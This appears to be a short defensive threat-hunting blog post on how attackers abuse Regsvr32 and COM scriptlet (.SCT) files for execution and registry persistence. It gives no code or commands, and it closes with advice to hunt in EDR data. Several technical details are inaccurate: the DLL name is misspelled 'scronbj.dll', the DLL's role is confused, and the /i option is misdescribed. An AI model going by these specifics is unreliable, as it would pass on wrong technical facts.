To install malware and persist on a target while maneuvering laterally across the network, adversaries employ diverse evasive techniques. A highly effective method they employ involves registering their malicious scripts in the registry, coexisting with legitimate Windows tools and system DLLs. What is an SCT file? The Component Object Model (COM) serves as a software component within Windows, storing scripts for software installed on a user's machine. These scripts, which can be written in languages like VBScript, JavaScript, or JScript, are saved in an unmanaged code format known as .SCT. Check code in .SCT files? Inspect for malicious SCT code and extract pertinent details from the malevolent scripts. In this instance, the code is attempting to execute the Windows calculator software on the machine without the user's consent, raising concerns that it may also constitute malware code.
What is Regsvr32.exe? Regsvr32 is a command-line utility used for the registration and unregistration of scripts in the Windows Registry, and it possesses the capability for network communication.
The options include a silent install (/s) and calling the Windows DLLRegister Server (/i) to register new information, whether it be legitimate or malicious codes. Adversaries exploit "Regsvr32" in conjunction with "scronbj.dll" to register their malicious script in the registry. The "scronbj.dll" library is crucial in this context as it serves as the Scripting Runtime library for communication with COM. The Scripting Runtime library "scronbj.dll" grants access to the file system, enabling operations such as reading and writing to text files. Attackers may exploit this library to manipulate file system components, including disk drives, folders, and files. Hunting the evil on Registry?
Examining the registry path reveals the persistence of the script being loaded during runtime. Search your EDR for similar behaviors and create additional Windows use cases. Happy hunting!